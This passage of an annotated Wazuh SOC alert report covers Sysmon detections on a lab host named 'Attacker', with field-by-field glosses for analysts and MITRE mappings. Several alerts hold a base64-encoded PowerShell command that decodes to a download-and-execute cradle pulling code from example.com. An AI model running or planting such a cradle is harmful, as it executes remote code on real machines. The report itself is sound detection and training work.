How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534231.1316177
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:03.0764574Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283407
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:03.058 ProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} ProcessId: 9884 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_01e43x2y.p5y.ps1 CreationUtcTime: 2025-04-24 22:37:03.058 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:03.058
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd0d-680a-1d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9884
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_01e43x2y.p5y.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:03.058
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:11.770+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:11.770+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  45
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534231.1318942
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:06.0543381Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283457
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:04.739 ProcessGuid: {94294ddc-bd10-680a-300b-000000000e00} ProcessId: 8832 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} ParentProcessId: 9884 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:04.739
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd10-680a-300b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd0d-680a-1d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9884
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:11.795+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:11.795+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  49
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534231.1327005
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:06.2915982Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283458
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:37:06.270 ProcessGuid: {94294ddc-bd10-680a-300b-000000000e00} ProcessId: 8832 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5pbr2kjg.zae.ps1 CreationUtcTime: 2025-04-24 22:37:06.270 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:06.270
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd10-680a-300b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5pbr2kjg.zae.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:06.270
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:12.154+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:12.154+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  46
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534232.1329770
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:37:09.0167902Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283484
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:07.666 ProcessGuid: {94294ddc-bd13-680a-340b-000000000e00} ProcessId: 11044 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd10-680a-300b-000000000e00} ParentProcessId: 8832 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:37:07.666
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd13-680a-340b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd10-680a-300b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8832
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:12.219+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:12.219+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  50
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
